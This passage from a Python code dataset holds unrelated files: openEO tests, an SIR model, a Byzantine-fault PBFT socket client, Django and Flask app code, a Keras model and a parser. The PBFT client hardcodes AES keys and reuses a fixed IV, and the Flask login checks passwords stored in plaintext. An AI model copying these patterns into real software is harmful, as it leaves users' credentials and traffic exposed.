\"s1_uc1_polarization.json\")\n self.non_existing_filepath = os.path.join(self.pg_dirpath, \"does_not_exist.json\")\n\n def test_translate_process_graph(self):\n \"\"\" Translates a process graph from openEO syntax to a Python traversable object. \"\"\"\n\n graph = translate_process_graph(self.uc1_polarization_pg_filepath)\n print(graph)\n assert True\n\n def test_process_graph_not_found(self):\n \"\"\" Checks if an error is thrown when a process graph file cannot be found. \"\"\"\n\n try:\n translate_process_graph(self.non_existing_filepath)\n except FileNotFoundError:\n assert True\n\n def test_from_global_parameter(self):\n \"\"\" Tests parsing of a globally defined parameter. \"\"\"\n global_parameter_filepath = os.path.join(self.pg_dirpath, \"s2_max_ndvi_global_parameter.json\")\n parameters = {'test_from_parameter': 3}\n graph = translate_process_graph(global_parameter_filepath, parameters=parameters)\n\n assert graph['ndvi_6'].arguments['y'] == 3\n\n def test_from_local_parameter(self):\n \"\"\" Tests parsing of a locally defined parameter. \"\"\"\n local_parameter_filepath = os.path.join(self.pg_dirpath, \"s2_max_ndvi_local_parameter.json\")\n graph = translate_process_graph(local_parameter_filepath)\n\n assert graph['ndvi_6'].arguments['y'] == 3\n\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"tests/test_translate.py","file_name":"test_translate.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"487030138","text":"from summer.model import StratifiedModel\nfrom autumn.constants import Compartment, BirthApproach\nfrom autumn.tool_kit.scenarios import get_model_times_from_inputs\n\n\ndef build_model(params: dict) -> StratifiedModel:\n \"\"\"\n Build the master function to run a simple SIR model\n \"\"\"\n compartments = [\n Compartment.SUSCEPTIBLE,\n Compartment.INFECTIOUS,\n Compartment.RECOVERED,\n ]\n\n flows = [\n {\n \"type\": \"infection_frequency\",\n \"parameter\": \"contact_rate\",\n \"origin\": Compartment.SUSCEPTIBLE,\n \"to\": Compartment.INFECTIOUS,\n },\n {\n \"type\": \"standard_flows\",\n \"parameter\": \"recovery_rate\",\n \"origin\": Compartment.INFECTIOUS,\n \"to\": Compartment.RECOVERED,\n },\n ]\n\n integration_times = get_model_times_from_inputs(\n round(params[\"start_time\"]), params[\"end_time\"], params[\"time_step\"]\n )\n\n init_conditions = {Compartment.INFECTIOUS: 1}\n\n sir_model = StratifiedModel(\n integration_times,\n compartments,\n init_conditions,\n params,\n flows,\n infectious_compartment=(Compartment.INFECTIOUS,),\n birth_approach=BirthApproach.NO_BIRTH,\n starting_population=1000000,\n )\n\n return sir_model\n","sub_path":"apps/sir_example/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"198510686","text":"import math\nimport time\nimport socket\nimport sys\nimport select\nimport pickle\nimport datetime\nimport pdb\nfrom Crypto.Cipher import AES\nfrom Crypto import Random\n\ndef roundup(x):\n return int(math.ceil(x / 10.0)) * 10\n\nN = 4\n\nIV = b'\\xa2\\xae\\x8b\\xbd\\xa5GJF\\x13\\xd9!\\xd6\\xad\\x13\\xe8\\xa5'\n\ncid = sys.argv[1]\nSERVER = sys.argv[2]\nPORT = sys.argv[3]\nBYZANTINE = sys.argv[4]\n\nkeys = {\n\t\t\t1: {2: b'Fixteen syte key', 3: b'Bixteen yyte key', 'server': b'Sixteen byte key'}, \n\t\t\t2: {1: b'Fixteen syte key', 3: b'Bilteen byte key', 'server': b'Sixteen syte key'},\n\t\t\t3: {1: b'Bixteen yyte key', 2: b'Bilteen byte key', 'server': b'Bixteen byte key'}\n\t\t}\n\nclient = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\nintro = \"REGISTER_REQUEST \"+str(cid)\nintro = intro.encode()\n\nclient.sendto(intro, (SERVER, int(PORT)))\n\nresponse, address = client.recvfrom(1024)\nneighbors = pickle.loads(response)\nprint(neighbors)\n\nport_mapper = dict()\nfor i in neighbors:\n\tport_mapper[i[2]] = i[0]\n\nport_mapper[int(PORT)] = 'server'\n\nSTAGE = 'PRE' \nmatch_message = \"\"\nmessages = []\nNEW_MESSAGE = False\n\n\nwhile 1:\n\t\tinputready, outputready, exceptrdy = select.select([0, client], [],[], 0.5)\n\n\t\tfor i in inputready:\n\t\t\tif NEW_MESSAGE:\n\t\t\t\tNEW_MESSAGE = False\n\t\t\t\tmessages = []\n\n\t\t\tdata, address = client.recvfrom(1024)\n\t\t\tport = address[1]\n\t\t\tcipher = AES.new(keys[int(cid)][port_mapper[port]], AES.MODE_EAX, IV)\n\t\t\tplaintext = cipher.decrypt(data)\n\t\t\tdata = plaintext[:-plaintext[-1]]\n\t\t\tprint(messages)\n\t\t\tmessages.append(data.decode())\n\n\t\tif not (inputready or outputready or exceptrdy):\n\t\t\tif STAGE == 'PRE':\n\t\t\t\tmatch_message = \"PREP10\".encode()\n\t\t\t\tif BYZANTINE == 'n':\n\t\t\t\t\tlength = 16 - (len(match_message) % 16)\n\t\t\t\t\tmatch_message += bytes([length])*length\n\t\t\t\t\tfor i in neighbors:\n\t\t\t\t\t\tcipher = AES.new(keys[int(cid)][i[0]], AES.MODE_EAX, IV)\n\t\t\t\t\t\tciphertext = cipher.encrypt(match_message)\n\t\t\t\t\t\tclient.sendto(ciphertext, (i[3], i[2]))\n\n\t\t\t\t\tcipher = AES.new(keys[int(cid)]['server'], AES.MODE_EAX, IV)\n\t\t\t\t\tciphertext = cipher.encrypt(match_message)\n\t\t\t\t\tclient.sendto(ciphertext, (SERVER, int(PORT)))\n\n\t\t\t\tif BYZANTINE == 'y':\n\t\t\t\t\tmatch = \"PREP11\".encode()\n\t\t\t\t\tlength = 16 - (len(match) % 16)\n\t\t\t\t\tmatch += bytes([length])*length\n\t\t\t\t\tfor i in neighbors:\n\t\t\t\t\t\tcipher = AES.new(keys[int(cid)][i[0]], AES.MODE_EAX, IV)\n\t\t\t\t\t\tciphertext = cipher.encrypt(match)\n\t\t\t\t\t\tclient.sendto(ciphertext, (i[3], i[2]))\n\n\t\t\t\t\tcipher = AES.new(keys[int(cid)]['server'], AES.MODE_EAX, IV)\n\t\t\t\t\tciphertext = cipher.encrypt(match)\n\t\t\t\t\tclient.sendto(ciphertext, (SERVER, int(PORT)))\n\t\t\t\t\n\t\t\t\tSTAGE = 'PREP'\n\t\t\t\tprint(\"Sent prepare\")\n\t\t\t\t\t\t\n\n\t\t\telif STAGE == 'PREP':\n\t\t\t\tmatch_message = \"PREP10\"\n\t\t\t\tif len([match for match in messages if match == \"PREP11\"]) >= 100 or len([match for match in messages if match == \"PREP10\"]) >= 2:\n\t\t\t\t\tmatch_message = \"COMMIT10\".encode()\n\t\t\t\t\tif BYZANTINE == 'n':\n\t\t\t\t\t\tlength = 16 - (len(match_message) % 16)\n\t\t\t\t\t\tmatch_message += bytes([length])*length\n\t\t\t\t\t\tfor i in neighbors:\n\t\t\t\t\t\t\tcipher = AES.new(keys[int(cid)][i[0]], AES.MODE_EAX, IV)\n\t\t\t\t\t\t\tciphertext = cipher.encrypt(match_message)\n\t\t\t\t\t\t\tclient.sendto(ciphertext, (i[3], i[2]))\n\n\t\t\t\t\t\tcipher = AES.new(keys[int(cid)]['server'], AES.MODE_EAX, IV)\n\t\t\t\t\t\tciphertext = cipher.encrypt(match_message)\n\t\t\t\t\t\tclient.sendto(ciphertext, (SERVER, int(PORT)))\n\n\t\t\t\t\tif BYZANTINE == 'y':\n\t\t\t\t\t\tmatch = \"COMMIT11\".encode()\n\t\t\t\t\t\tlength = 16 - (len(match) % 16)\n\t\t\t\t\t\tmatch += bytes([length])*length\n\t\t\t\t\t\tfor i in neighbors:\n\t\t\t\t\t\t\tcipher = AES.new(keys[int(cid)][i[0]], AES.MODE_EAX, IV)\n\t\t\t\t\t\t\tciphertext = cipher.encrypt(match)\n\t\t\t\t\t\t\tclient.sendto(ciphertext, (i[3], i[2]))\n\n\t\t\t\t\t\tcipher = AES.new(keys[int(cid)]['server'], AES.MODE_EAX, IV)\n\t\t\t\t\t\tciphertext = cipher.encrypt(match)\n\t\t\t\t\t\tclient.sendto(ciphertext, (SERVER, int(PORT)))\n\n\t\t\t\t\tprint(\"Sent commit\")\n\t\t\t\t\tSTAGE = 'COMMIT'\n\n\n\t\t\telif STAGE == 'COMMIT':\n\t\t\t\tif BYZANTINE == 'n':\n\t\t\t\t\tmatch_message = \"COMMIT10\"\n\t\t\t\t\tif len([match for match in messages if match == \"PREP11\"]) >= 100 or len([match for match in messages if match == \"COMMIT10\"]) >= 2:\n\t\t\t\t\t\tNEW_MESSAGE = True\n\t\t\t\t\t\tprint(\"committed \", match_message)\n\t\t\t\t\t\tSTAGE = 'PRE'\n\t\t\t\t\t\tprint(\"DONE\")\n\n\t\t\t\tif BYZANTINE == 'y':\n\t\t\t\t\tNEW_MESSAGE = True\n\t\t\t\t\tprint(\"committed \", match_message)\n\t\t\t\t\tSTAGE = 'PRE'\n\t\t\t\t\tprint(\"DONE\")\n\t\t\t\t\n\t\t\t\tt = datetime.datetime.utcnow()\n\t\t\t\tnow = t.second + t.microsecond/1000000.0\n\t\t\t\tfuture = roundup(now)\n\t\t\t\tsleeptime = future - now\n\t\t\t\ttime.sleep(sleeptime)","sub_path":"SocketProgramming/PBFT/AttackerTests/test_conn.py","file_name":"test_conn.py","file_ext":"py","file_size_in_byte":4468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"230807697","text":"from django.utils.encoding import python_2_unicode_compatible\nfrom django.core.validators import MinValueValidator\nfrom django.db import models\n\nfrom mapping.common.mixins import TimestampsMixin\n\n\n@python_2_unicode_compatible\nclass Company(TimestampsMixin):\n \"Company\"\n name = models.CharField(\n 'company name',\n max_length=150,)\n\n is_active = models.BooleanField(\n 'active',\n help_text='Company status',\n default=False,)\n\n user_limit = models.PositiveSmallIntegerField(\n 'user limit',\n help_text='Max. number of users allowed',\n default=10,\n validators=[MinValueValidator(1)],)\n\n class Meta:\n verbose_name_plural = 'Companies'\n\n def __str__(self):\n return self.name\n","sub_path":"mapping/accounts/models/company.py","file_name":"company.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"651111920","text":"# -*- coding:utf-8 -*-\nfrom urllib.parse import urlparse, parse_qs\n\nfrom attrdict import AttrDict\nfrom flask import Blueprint\nfrom flask import request\nfrom flask_login import login_user, current_user\n\nfrom meier_app.commons.jwt_token import TokenInfo, create_token\nfrom meier_app.commons.logger import logger\nfrom meier_app.commons.response_data import ResponseData, HttpStatusCode\nfrom meier_app.extensions import db\nfrom meier_app.models.settings import Settings\nfrom meier_app.models.user import User\nfrom meier_app.resources.admin import base\n\nadmin_user_api = Blueprint('admin_user_api', __name__, url_prefix='/admin/user/api')\n\n\n@admin_user_api.route('/user_info', methods=['GET'])\n@base.api_exception_handler\ndef user_info_api():\n user = User.query.filter(User.email == current_user.email).scalar()\n if user is None:\n raise Exception('user_info is none.')\n return ResponseData(code=HttpStatusCode.SUCCESS, data=user.for_user_info).json\n\n\n@admin_user_api.route('/user_info', methods=['PUT'])\n@base.api_exception_handler\ndef update_user_info_api():\n logger.debug(request.headers)\n logger.debug(request.get_json())\n User.query.filter(User.email == current_user.email).update(request.get_json())\n db.session.commit()\n return ResponseData(code=HttpStatusCode.SUCCESS).json\n\n\n@admin_user_api.route('/login', methods=['POST'])\n@base.api_exception_handler\ndef login_api():\n logger.debug(request.referrer)\n req_data = AttrDict(request.get_json())\n logger.debug(req_data)\n settings = Settings.query.first()\n if req_data.email and req_data.password:\n user = User.query.filter(User.email == req_data.email.strip()) \\\n .filter(User.password == req_data.password.strip()).scalar()\n if user:\n token = create_token(token_info=TokenInfo(\n user_name=user.user_name,\n email=user.email,\n profile_image=user.profile_image,\n blog_title=settings.blog_title if settings else None\n ))\n\n user.token = token\n login_user(user)\n next = '/admin/contents'\n if request.referrer:\n url_parsed = urlparse(url=request.referrer)\n if url_parsed.query:\n parsed_qs = parse_qs(url_parsed.query)\n next = parsed_qs.get('next', ['/admin/contents'])[0]\n return ResponseData(code=HttpStatusCode.SUCCESS, data={'next': next}).json\n else:\n return ResponseData(code=HttpStatusCode.INVALID_AUTHORIZATION).json\n else:\n return ResponseData(code=HttpStatusCode.INVALID_AUTHORIZATION).json\n","sub_path":"meier_app/resources/admin/user/user_api.py","file_name":"user_api.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"210155590","text":"from keras.layers import Input, Dense, Dropout, Flatten, merge, Reshape\nfrom keras.layers import Convolution1D, MaxPooling1D\nfrom keras.models import Model\nfrom keras.layers import Activation, Dropout, Embedding,Bidirectional, Highway\nfrom keras.layers import LSTM,TimeDistributed\nfrom keras.layers.normalization import BatchNormalization\n\ndef build_cnn_blstm_vec(input_set_size, width, height, mul_nb_classes, matrix):\n\tprint('cnn-blstm-vec model building...')\n\tinputs = Input(shape=(height,),dtype='int32')\n\t#embedd = Embedding(input_set_size, width, input_length=height)(inputs)\n\tembedd = Embedding(input_set_size, width,\n weights=[matrix],\n input_length=height,\n trainable=False)(inputs)\n\t\n\t# conv\n\tconv1_1 = Convolution1D(64, 3, border_mode='same', activation='relu')(embedd)\n\tbn1 = BatchNormalization(mode=1)(conv1_1)\n\tpool1 = MaxPooling1D(pool_length=2)(bn1)\n\tdrop1 = Dropout(0.2)(pool1)\n\t\t\n\t# 2 conv\n\tconv2_1 = Convolution1D(128, 2, border_mode='same', activation='relu')(drop1)\n\tbn2 = BatchNormalization(mode=1)(conv2_1)\n\tpool2 = MaxPooling1D(pool_length=2)(bn2)\n\tdrop2 = Dropout(0.2)(pool2)\n\n\t\n\t# 3 conv\n\tconv3_1 = Convolution1D(192, 2, border_mode='same', activation='relu')(drop2)\n\tbn3 = BatchNormalization(mode=1)(conv3_1)\n\t#pool3 = MaxPooling1D(pool_length=2)(bn3)\n\tdrop3 = Dropout(0.1)(bn3)\n\t'''\t\n\t# 4 conv\n\tconv4_1 = Convolution1D(192, 2, border_mode='same', activation='relu')(drop3)\n\tbn4 = BatchNormalization(mode=1)(conv4_1)\n\t#pool4 = MaxPooling1D(pool_length=2)(bn4)\n\tdrop4 = Dropout(0.1)(bn4)\n\t'''\n\t#b = merge([bn4, drop3], mode='concat')\n\t# blstm\n\tblstm = Bidirectional(LSTM(256, return_sequences=False), merge_mode='sum')(drop3)\n\tdrop = Dropout(0.5)(blstm)\n\t\n\t\n\t# highway\n\t#highway = Highway(128)(drop)\n\t'''\n\t# 3 conv\n\tconv3_1 = Convolution1D(64, 2, border_mode='same', activation='relu')(dropb)\n\tbn3 = BatchNormalization(mode=1)(conv3_1)\n\tpool3 = MaxPooling1D(pool_length=2)(bn3)\n\tdrop3 = Dropout(0.1)(bn3)\n\t#flat = Flatten()(drop3)\n\t'''\n\t\n # output\n\tout1 = Dense(mul_nb_classes[0], activation='sigmoid')(drop)\n\tmerged1 = merge([out1, drop], mode='concat')\n\tout2 = Dense(mul_nb_classes[1], activation='sigmoid')(merged1)\n\tmerged2 = merge([out2, drop], mode='concat')\n\tout3 = Dense(mul_nb_classes[2], activation='sigmoid')(merged2)\n\tmerged3 = merge([out3, drop], mode='concat')\n\tout4 = Dense(mul_nb_classes[3], activation='sigmoid')(merged3)\n\n\tout = [out1, out2, out3, out4]\n\tmodel = Model(input=[inputs], output=out)\n\tmodel.summary()\n\tmodel.compile(loss='binary_crossentropy',\n optimizer='adam',\n metrics=['accuracy'],\n )\n\tprint(\"cnn-blstm-vec model has built.\")\n\treturn model\n\n","sub_path":"model/clstm_vec.py","file_name":"clstm_vec.py","file_ext":"py","file_size_in_byte":2789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"355137029","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('product', '0019_auto_20160110_1905'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Order',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('order_time', models.DateTimeField(auto_now_add=True)),\n ('street', models.CharField(max_length=255)),\n ('house_number', models.PositiveIntegerField()),\n ('zipcode', models.PositiveIntegerField()),\n ('city', models.CharField(max_length=40, blank=True)),\n ('phone_number', models.CharField(max_length=20)),\n ('order_status', models.PositiveIntegerField(default=1, verbose_name=b'Order Status', choices=[(1, b'Pending'), (2, b'Processed'), (3, b'Shipped'), (4, b'Done')])),\n ('payment_status', models.PositiveIntegerField(default=1, verbose_name=b'Payment Status', choices=[(1, b'unpaid'), (2, b'paid')])),\n ],\n ),\n ]\n","sub_path":"product/migrations/0020_order.py","file_name":"0020_order.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"90226761","text":"import wolframalpha\nfrom app.mac import mac, signals\nfrom modules.wolfram import config\n\n'''\nSignals this module listents to:\n1. When a message is received (signals.message_received)\n==========================================================\n'''\n@signals.message_received.connect\ndef handle(message):\n request = shoudl_answer(message)\n if request != '':\n mac.send_message(wolfram_answer(request), message.conversation)\n\n\n'''\nActual module code\n==========================================================\n'''\ndef wolfram_answer(message):\n app_id = config.api_key\n client = wolframalpha.Client(app_id)\n answer = \"\"\n try:\n res = client.query(message)\n if hasattr(res, 'pods'):\n answer = next(res.results).text\n else:\n answer = \"I don't have an answer for that\"\n except:\n answer = \"I cannot show the answer here\"\n \n # Hehe\n if answer == \"I was created by Stephen Wolfram and his team.\":\n answer = \"Daniel Cardenas created me but I get these answers from an engine made by Stephen Wolfram and his team.\"\n \n return answer\n \ndef shoudl_answer(message):\n if message.message[:4].lower() == 'mac,':\n return message.message[4:].strip()\n elif message.message[:3].lower() == 'mac':\n return message.message[3:].strip()\n else:\n return \"\"","sub_path":"modules/wolfram/wolfram_mac.py","file_name":"wolfram_mac.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"453875837","text":"import logging\nimport json\n\nclass ParserError(Exception):\n pass\n\n\nclass Tokens:\n NONE = 'NONE'\n IGNORE = 'IGNORE'\n\nclass TokenBuffer:\n def __init__(self, tokens):\n self.tokens = tokens[:]\n self.pointer = 0\n\n #TODO: add increment, decrement and access, and to_bool\n\ndef any_of(*accepts):\n def f(tokens):\n\n for accept in accepts:\n tokens, result = accept(tokens)\n if result not in [Tokens.NONE, Tokens.IGNORE]:\n return tokens, result\n\n return tokens, Tokens.NONE\n\n return f\n\ndef all_of(*accepts):\n def f(tokens):\n orig = tokens[:]\n results = []\n for accept in accepts:\n tokens, result = accept(tokens)\n if result == Tokens.NONE:\n return orig, Tokens.NONE\n elif result == Tokens.IGNORE:\n continue\n else:\n results += [result]\n\n return tokens, results\n\n return f\n\ndef many_of(accept):\n def f(tokens):\n results = []\n while tokens:\n tokens, result = accept(tokens)\n if result == Tokens.NONE:\n break\n elif result == Tokens.IGNORE:\n continue\n else:\n results += [result]\n return tokens, results\n return f\n\ndef maybe(accept):\n def f(tokens):\n tokens, result = accept(tokens)\n if result == Tokens.NONE:\n result = Tokens.IGNORE\n return tokens, result\n return f\n\ndef supress(accept):\n def f(tokens):\n tokens, result = accept(tokens)\n if result != Tokens.NONE:\n result = Tokens.IGNORE\n return tokens, result\n return f\n\ndef ignore(accept):\n def f(tokens):\n tokens, result = accept(tokens)\n return tokens, Tokens.IGNORE\n return f\n\ndef no_leading_nl(accept):\n def f(tokens):\n _, token = get_first_token(tokens, ignore=['WS', 'COMMENT'])\n if token == 'NL':\n return tokens, Tokens.IGNORE\n tokens, result = accept(tokens)\n return tokens, result\n return f\n\ndef interlace(accept, delimeter):\n def f(tokens):\n\n results = []\n tokens, result = accept(tokens)\n if result == Tokens.NONE:\n return tokens, Tokens.NONE\n elif result == Tokens.IGNORE:\n pass\n else:\n results += [result]\n\n while True:\n tokens, result = all_of(delimeter, accept)(tokens)\n if result == Tokens.NONE:\n break\n\n results += [result[-1]]\n\n return tokens, results\n return f\n\n\n#TODO: I don't think these are right\nsupress_many_or_zero = lambda accept: supress(many_of(accept))\nignore_many = lambda accept: ignore(many_of(accept))\nsupress_many = lambda accept: all_of(supress(accept), supress_many(accept))\n\n\ndef get_first_token(tokens, ignore=None):\n if ignore == None:\n ignore = ['WS', 'NL', 'COMMENT']\n\n i = 0\n try:\n while tokens[i]['type'] in ignore:\n i += 1\n except IndexError:\n return tokens, None\n\n return tokens[i+1:], tokens[i]\n\n\ndef accept_token(types, ignore=None):\n if ignore == None:\n ignore = ['WS', 'NL', 'COMMENT']\n\n def f(tokens):\n next_tokens, next_token = get_first_token(tokens, ignore)\n\n if isinstance(types, str):\n my_types = [types]\n elif isinstance(types, list):\n my_types = types\n\n if next_token is None:\n return tokens, Tokens.NONE\n\n if next_token['type'] in my_types:\n return next_tokens, {\n 'type': next_token['type'].lower(),\n 'value': next_token['text'],\n }\n\n return tokens, Tokens.NONE\n return f\n\ng_indent = 0\n\ndef debug_accept(accept):\n def f(tokens):\n global g_indent\n\n if g_indent == 0:\n indentation = ' '\n else:\n indentation = (g_indent - 1) * ' ' + '< '\n\n logging.debug('%saccepting: %s -> %s', indentation, accept.__name__, get_first_token(tokens)[1])\n g_indent += 1\n tokens, result = accept(tokens)\n g_indent -= 1\n\n if g_indent == 0:\n indentation = ' '\n else:\n indentation = (g_indent - 1) * ' ' + '> '\n\n if result == Tokens.NONE:\n logging.debug('%sfailed: %s', indentation, accept.__name__)\n elif result == Tokens.IGNORE:\n logging.debug('%signored: %s', indentation, accept.__name__)\n else:\n logging.debug('%saccepted: %s -> %s', indentation, accept.__name__, result)\n\n return tokens, result\n\n return f\n\n@debug_accept\ndef accept_def(tokens): return accept_token('DEF')(tokens)\n@debug_accept\ndef accept_id(tokens): return accept_token('ID')(tokens)\n@debug_accept\ndef accept_ws(tokens): return accept_token('WS')(tokens)\n@debug_accept\ndef accept_nl(tokens): return accept_token('NL')(tokens)\n@debug_accept\ndef accept_comma(tokens): return accept_token('COMMA')(tokens)\n@debug_accept\ndef accept_equal(tokens): return accept_token('EQUAL')(tokens)\n\n@debug_accept\ndef accept_left_curly(tokens): return accept_token('L_CURLY')(tokens)\n@debug_accept\ndef accept_right_curly(tokens): return accept_token('R_CURLY')(tokens)\n@debug_accept\ndef accept_left_square(tokens): return accept_token('L_SQUARE')(tokens)\n@debug_accept\ndef accept_right_square(tokens): return accept_token('R_SQUARE')(tokens)\n@debug_accept\ndef accept_left_paren(tokens): return accept_token('L_PAREN')(tokens)\n@debug_accept\ndef accept_right_paren(tokens): return accept_token('R_PAREN')(tokens)\n\n@debug_accept\ndef accept_string_literal(tokens): return accept_token('STRING')(tokens)\n@debug_accept\ndef accept_number(tokens): return accept_token('NUMBER')(tokens)\n\n@debug_accept\ndef accept_plus(tokens): return accept_token('PLUS')(tokens)\n@debug_accept\ndef accept_minus(tokens): return accept_token('MINUS')(tokens)\n@debug_accept\ndef accept_star(tokens): return accept_token('STAR')(tokens)\n@debug_accept\ndef accept_slash(tokens): return accept_token('SLASH')(tokens)\n\n@debug_accept\ndef accept_statement_list(tokens):\n\n tokens, statements = interlace(\n accept_statement,\n many_of(accept_nl)\n )(tokens)\n\n return tokens, statements\n\n@debug_accept\ndef accept_function_args(tokens):\n\n tokens, result = all_of(\n supress(accept_left_square),\n interlace( #TODO: maybe id\n accept_id,\n accept_comma\n ),\n supress(accept_right_square),\n )(tokens)\n\n if result == Tokens.NONE:\n return tokens, Tokens.NONE\n\n [ids] = result\n ids = [x['value'] for x in ids]\n\n return tokens, ids\n\n@debug_accept\ndef accept_lambda_expression(tokens):\n tokens, result = all_of(\n accept_function_args,\n supress(accept_left_curly), #TODO: accept it without curly brackets, if one expression\n accept_statement_list, #TODO: maybe statement_list\n supress(accept_right_curly),\n )(tokens)\n\n if result == Tokens.NONE:\n return tokens, Tokens.NONE\n\n [args, statements] = result\n\n return tokens, {\n 'type': 'lambda_expression',\n 'args': args,\n 'statements': statements,\n }\n\n@debug_accept\ndef accept_function_call(tokens):\n\n tokens, result = all_of(\n supress(accept_left_paren),\n interlace(\n accept_expression,\n accept_comma\n ),\n supress(accept_right_paren),\n )(tokens)\n\n if result == Tokens.NONE:\n return tokens, Tokens.NONE\n\n [parameters] = result\n\n return tokens, parameters\n\n@debug_accept\ndef accept_bracketted_expression(tokens):\n tokens, expression = all_of(\n supress(accept_left_paren),\n accept_expression,\n supress(accept_right_paren),\n )(tokens)\n\n if expression == Tokens.NONE:\n return tokens, Tokens.NONE\n\n [expression] = expression\n\n return tokens, expression\n\n@debug_accept\ndef accept_list_expression(tokens):\n\n # Test for empty list\n tokens, expression = all_of(\n supress(accept_left_square),\n supress(accept_right_square),\n )(tokens)\n\n if expression != Tokens.NONE:\n return tokens, {\n \"type\" : \"list\",\n \"value\": []\n }\n\n tokens, expression = all_of(\n supress(accept_left_square),\n interlace(\n accept_expression,\n accept_comma\n ),\n supress(accept_right_square),\n )(tokens)\n\n if expression == Tokens.NONE:\n return tokens, Tokens.NONE\n\n [expression] = expression\n\n return tokens, {\n \"type\" : \"list\",\n \"value\": expression\n }\n\n\n@debug_accept\ndef accept_atom_expression(tokens):\n\n tokens, expression = any_of(\n accept_lambda_expression,\n accept_list_expression,\n #accept_array_expression,\n #accept_map_expression,\n #accept_set_expression,\n #accept_object_expression,\n #accept_class_expression,\n\n #if_expression\n #for_expression\n #while_expression\n\n accept_id,\n accept_string_literal,\n accept_number,\n accept_bracketted_expression,\n )(tokens)\n\n if expression == Tokens.NONE:\n return tokens, Tokens.NONE\n\n prev_result = expression\n\n while tokens:\n\n tokens, parameters = no_leading_nl(\n accept_function_call\n )(tokens)\n\n if parameters == Tokens.NONE:\n break\n\n prev_result = {\n 'type': 'function_call_expression',\n 'function': prev_result['value'] if prev_result['type'] == 'id' else prev_result,\n 'parameters': parameters,\n }\n\n return tokens, prev_result\n\n\n@debug_accept\ndef accept_term_expression(tokens):\n\n tokens, lhs = any_of(\n accept_atom_expression,\n )(tokens)\n\n if lhs == Tokens.NONE:\n return tokens, Tokens.NONE\n\n prev_result = lhs\n\n while tokens:\n\n tokens, other = all_of(\n any_of(\n accept_star,\n accept_slash,\n ),\n accept_atom_expression\n )(tokens)\n\n\n if other == Tokens.NONE:\n break\n\n [sign, rhs] = other\n\n if sign['type'] == 'star':\n function = '__mul__'\n elif sign['type'] == 'slash':\n function = '__div__'\n else:\n raise ParserError('invalid configuration')\n\n prev_result = {\n 'type': 'function_call_expression',\n 'function': function,\n 'parameters': [prev_result, rhs],\n }\n\n return tokens, prev_result\n\n@debug_accept\ndef accept_expression(tokens):\n\n tokens, lhs = any_of(\n accept_term_expression,\n )(tokens)\n\n if lhs == Tokens.NONE:\n return tokens, Tokens.NONE\n\n prev_result = lhs\n\n while tokens:\n\n tokens, other = all_of(\n any_of(\n accept_plus,\n accept_minus,\n ),\n accept_term_expression\n )(tokens)\n\n\n if other == Tokens.NONE:\n break\n\n [sign, rhs] = other\n\n if sign['type'] == 'plus':\n function = '__add__'\n elif sign['type'] == 'minus':\n function = '__sub__'\n else:\n raise ParserError('invalid configuration')\n\n prev_result = {\n 'type': 'function_call_expression',\n 'function': function,\n 'parameters': [prev_result, rhs],\n }\n\n return tokens, prev_result\n\n@debug_accept\ndef accept_declaration_statement(tokens):\n\n tokens, result = all_of(\n accept_def,\n no_leading_nl(accept_id),\n no_leading_nl(accept_expression),\n )(tokens)\n\n if result == Tokens.NONE:\n return tokens, Tokens.NONE\n\n [_, id, value] = result\n\n return tokens, {\n 'type': 'declaration_statement',\n 'name': id['value'],\n 'value': value,\n }\n\n@debug_accept\ndef accept_assignment_statement(tokens):\n tokens, result = all_of(\n accept_id,\n no_leading_nl(accept_equal),\n no_leading_nl(accept_expression),\n )(tokens)\n\n if result == Tokens.NONE:\n return tokens, Tokens.NONE\n\n [id, _, value] = result\n\n return tokens, {\n 'type': 'assignment_statement',\n 'to': id,\n 'value': value,\n }\n\n@debug_accept\ndef accept_statement(tokens):\n\n tokens, statement = any_of(\n accept_declaration_statement,\n accept_assignment_statement,\n accept_expression,\n )(tokens)\n\n return tokens, statement\n\n@debug_accept\ndef accept_top_level(tokens):\n\n tokens, statements = accept_statement_list(tokens)\n\n return tokens, statements\n\ndef parse(tokens):\n\n tokens, statements = accept_top_level(tokens)\n\n result = {\n \"version\": \"0.0.1\",\n \"statements\": statements\n }\n\n return result\n","sub_path":"eye/eyescript/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":12798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"547274086","text":"from rest_framework import serializers\n\nfrom apps.accounts.serializers import UserSerializer\nfrom apps.utils.fields import Base64FileField\nfrom apps.utils.mixins import AwsUrlMixin, FileValidationMixin\nfrom apps.wounds.models import Wound, Evolution\n\n\nclass EvolutionSerializer(AwsUrlMixin, serializers.ModelSerializer):\n photo = Base64FileField(max_length=None, use_url=True, write_only=True, required=False, allow_null=True)\n photo_url = serializers.SerializerMethodField()\n thumb_url = serializers.SerializerMethodField()\n width = serializers.DecimalField(write_only=True, max_digits=5, decimal_places=2)\n height = serializers.DecimalField(write_only=True, max_digits=5, decimal_places=2)\n evolution_width = serializers.SerializerMethodField()\n evolution_height = serializers.SerializerMethodField()\n user = UserSerializer(read_only=True)\n\n class Meta:\n model = Evolution\n fields = (\n 'width', 'height', 'evolution_width', 'evolution_height', 'photo_url', 'thumb_url', 'photo', 'wound', 